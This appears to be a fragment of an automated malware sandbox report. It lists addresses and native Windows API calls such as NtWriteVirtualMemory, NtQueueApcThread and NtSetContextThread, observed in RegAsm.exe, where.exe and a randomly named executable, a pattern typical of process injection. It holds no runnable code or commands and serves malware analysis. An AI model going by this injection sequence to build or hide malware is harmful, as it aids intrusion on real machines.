        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232FA0 NtQuerySection,5_2_03232FA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232FB0 NtResumeThread,5_2_03232FB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232F90 NtProtectVirtualMemory,5_2_03232F90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232FE0 NtCreateFile,5_2_03232FE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232E30 NtWriteVirtualMemory,5_2_03232E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232EA0 NtAdjustPrivilegesToken,5_2_03232EA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232E80 NtReadVirtualMemory,5_2_03232E80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232EE0 NtQueueApcThread,5_2_03232EE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232D30 NtUnmapViewOfSection,5_2_03232D30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232D00 NtSetInformationFile,5_2_03232D00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03233D10 NtOpenProcessToken,5_2_03233D10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232D10 NtMapViewOfSection,5_2_03232D10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03233D70 NtOpenThread,5_2_03233D70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232DB0 NtEnumerateKey,5_2_03232DB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232DD0 NtDelayExecution,5_2_03232DD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232C00 NtQueryInformationProcess,5_2_03232C00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232C60 NtCreateKey,5_2_03232C60
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232CA0 NtQueryInformationToken,5_2_03232CA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232CF0 NtOpenProcess,5_2_03232CF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03232CC0 NtQueryVirtualMemory,5_2_03232CC0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B35C0 NtCreateMutant,LdrInitializeThunk,8_2_049B35C0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B4650 NtSuspendThread,LdrInitializeThunk,8_2_049B4650
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B4340 NtSetContextThread,LdrInitializeThunk,8_2_049B4340
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_049B2CA0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_049B2C70
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2C60 NtCreateKey,LdrInitializeThunk,8_2_049B2C60
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2DD0 NtDelayExecution,LdrInitializeThunk,8_2_049B2DD0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_049B2DF0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_049B2D10
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_049B2D30
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_049B2E80
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2EE0 NtQueueApcThread,LdrInitializeThunk,8_2_049B2EE0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2FB0 NtResumeThread,LdrInitializeThunk,8_2_049B2FB0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2FE0 NtCreateFile,LdrInitializeThunk,8_2_049B2FE0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2F30 NtCreateSection,LdrInitializeThunk,8_2_049B2F30
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B39B0 NtGetContextThread,LdrInitializeThunk,8_2_049B39B0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2AD0 NtReadFile,LdrInitializeThunk,8_2_049B2AD0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2AF0 NtWriteFile,LdrInitializeThunk,8_2_049B2AF0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_049B2BA0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_049B2BF0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_049B2BE0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2B60 NtClose,LdrInitializeThunk,8_2_049B2B60
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B3090 NtSetValueKey,8_2_049B3090
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B3010 NtOpenDirectoryObject,8_2_049B3010
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2CC0 NtQueryVirtualMemory,8_2_049B2CC0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2CF0 NtOpenProcess,8_2_049B2CF0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2C00 NtQueryInformationProcess,8_2_049B2C00
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2DB0 NtEnumerateKey,8_2_049B2DB0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B3D10 NtOpenProcessToken,8_2_049B3D10
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2D00 NtSetInformationFile,8_2_049B2D00
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B3D70 NtOpenThread,8_2_049B3D70
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2EA0 NtAdjustPrivilegesToken,8_2_049B2EA0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2E30 NtWriteVirtualMemory,8_2_049B2E30
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2F90 NtProtectVirtualMemory,8_2_049B2F90
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2FA0 NtQuerySection,8_2_049B2FA0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2F60 NtCreateProcessEx,8_2_049B2F60
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2AB0 NtWaitForSingleObject,8_2_049B2AB0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B2B80 NtQueryInformationFile,8_2_049B2B80
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007A95B0 NtCreateFile,8_2_007A95B0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007A9720 NtReadFile,8_2_007A9720
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007A9820 NtDeleteFile,8_2_007A9820
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007A98D0 NtClose,8_2_007A98D0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007A9A30 NtAllocateVirtualMemory,8_2_007A9A30
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479F1CC NtQueryInformationProcess,8_2_0479F1CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00418B735_2_00418B73
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004028405_2_00402840
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004031405_2_00403140
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042F2C35_2_0042F2C3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004103F35_2_004103F3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416D735_2_00416D73
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004106135_2_00410613
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040E6935_2_0040E693
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B132D5_2_032B132D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031ED34C5_2_031ED34C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BA3525_2_032BA352
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0324739A5_2_0324739A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C03E65_2_032C03E6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E3F05_2_0320E3F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A02745_2_032A0274
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032052A05_2_032052A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A12ED5_2_032A12ED
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B2C05_2_0321B2C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F01005_2_031F0100
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329A1185_2_0329A118
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032CB16B5_2_032CB16B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0323516C5_2_0323516C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EF1725_2_031EF172
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C01AA5_2_032C01AA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320B1B05_2_0320B1B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B81CC5_2_032B81CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B70E95_2_032B70E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BF0E05_2_032BF0E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032070C05_2_032070C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AF0CC5_2_032AF0CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032007705_2_03200770
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032247505_2_03224750
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BF7B05_2_032BF7B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FC7C05_2_031FC7C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321C6E05_2_0321C6E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B16CC5_2_032B16CC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032005355_2_03200535
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B75715_2_032B7571
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329D5B05_2_0329D5B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C05915_2_032C0591
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BF43F5_2_032BF43F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B24465_2_032B2446
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F14605_2_031F1460
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AE4F65_2_032AE4F6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BFB765_2_032BFB76
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BAB405_2_032BAB40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321FB805_2_0321FB80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0323DBF95_2_0323DBF9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B6BD75_2_032B6BD7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03273A6C5_2_03273A6C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BFA495_2_032BFA49
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B7A465_2_032B7A46
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03245AA05_2_03245AA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329DAAC5_2_0329DAAC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FEA805_2_031FEA80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032ADAC65_2_032ADAC6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032169625_2_03216962
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032099505_2_03209950
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321B9505_2_0321B950
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032029A05_2_032029A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032CA9A65_2_032CA9A6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032028405_2_03202840
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320A8405_2_0320A840
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E68B85_2_031E68B8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032038E05_2_032038E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322E8F05_2_0322E8F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03242F285_2_03242F28
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03220F305_2_03220F30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BFF095_2_032BFF09
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03274F405_2_03274F40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BFFB15_2_032BFFB1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03201F925_2_03201F92
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320CFE05_2_0320CFE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F2FC85_2_031F2FC8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BEE265_2_032BEE26
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200E595_2_03200E59
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03209EB05_2_03209EB0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03212E905_2_03212E90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BCE935_2_032BCE93
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BEEDB5_2_032BEEDB
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320AD005_2_0320AD00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B7D735_2_032B7D73
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03203D405_2_03203D40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B1D5A5_2_032B1D5A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03218DBF5_2_03218DBF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321FDC05_2_0321FDC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FADE05_2_031FADE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03279C325_2_03279C32
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03200C005_2_03200C00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032A0CB55_2_032A0CB5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BFCF25_2_032BFCF2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F0CF25_2_031F0CF2
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_03568A4B7_2_03568A4B
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_0357112B7_2_0357112B
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_0356A9CB7_2_0356A9CB
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_03572F2B7_2_03572F2B
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_0356A7AB7_2_0356A7AB
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 7_2_0358967B7_2_0358967B
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A2E4F68_2_04A2E4F6
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3F43F8_2_04A3F43F
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A324468_2_04A32446
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049714608_2_04971460
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A1D5B08_2_04A1D5B0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A405918_2_04A40591
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049805358_2_04980535
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A375718_2_04A37571
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A316CC8_2_04A316CC
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0499C6E08_2_0499C6E0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3F7B08_2_04A3F7B0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0497C7C08_2_0497C7C0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049A47508_2_049A4750
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049807708_2_04980770
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3F0E08_2_04A3F0E0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A370E98_2_04A370E9
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049870C08_2_049870C0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A2F0CC8_2_04A2F0CC
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A401AA8_2_04A401AA
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0498B1B08_2_0498B1B0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A381CC8_2_04A381CC
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049701008_2_04970100
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A1A1188_2_04A1A118
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A4B16B8_2_04A4B16B
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0496F1728_2_0496F172
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B516C8_2_049B516C
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049852A08_2_049852A0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A212ED8_2_04A212ED
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0499B2C08_2_0499B2C0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A202748_2_04A20274
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049C739A8_2_049C739A
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A403E68_2_04A403E6
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0498E3F08_2_0498E3F0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3132D8_2_04A3132D
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0496D34C8_2_0496D34C
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3A3528_2_04A3A352
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A20CB58_2_04A20CB5
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3FCF28_2_04A3FCF2
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04970CF28_2_04970CF2
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04980C008_2_04980C00
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049F9C328_2_049F9C32
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04998DBF8_2_04998DBF
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0499FDC08_2_0499FDC0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0497ADE08_2_0497ADE0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0498AD008_2_0498AD00
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A37D738_2_04A37D73
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04983D408_2_04983D40
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A31D5A8_2_04A31D5A
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04992E908_2_04992E90
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04989EB08_2_04989EB0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3CE938_2_04A3CE93
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3EEDB8_2_04A3EEDB
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3EE268_2_04A3EE26
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04980E598_2_04980E59
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04981F928_2_04981F92
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3FFB18_2_04A3FFB1
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04972FC88_2_04972FC8
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0498CFE08_2_0498CFE0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3FF098_2_04A3FF09
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049A0F308_2_049A0F30
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049C2F288_2_049C2F28
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049F4F408_2_049F4F40
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049668B88_2_049668B8
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049AE8F08_2_049AE8F0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049838E08_2_049838E0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049ED8008_2_049ED800
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049828408_2_04982840
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0498A8408_2_0498A840
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A4A9A68_2_04A4A9A6
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049829A08_2_049829A0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049899508_2_04989950
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0499B9508_2_0499B950
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049969628_2_04996962
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A1DAAC8_2_04A1DAAC
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0497EA808_2_0497EA80
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049C5AA08_2_049C5AA0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A2DAC68_2_04A2DAC6
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A37A468_2_04A37A46
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3FA498_2_04A3FA49
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049F3A6C8_2_049F3A6C
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0499FB808_2_0499FB80
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049BDBF98_2_049BDBF9
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A36BD78_2_04A36BD7
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3FB768_2_04A3FB76
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3AB408_2_04A3AB40
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007920E08_2_007920E0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0078D0008_2_0078D000
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0078D2208_2_0078D220
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0078B2A08_2_0078B2A0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007957808_2_00795780
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007939808_2_00793980
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007ABED08_2_007ABED0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479E4538_2_0479E453
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_047A54248_2_047A5424
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_047A54AF8_2_047A54AF
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_047A549B8_2_047A549B
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_047A548B8_2_047A548B
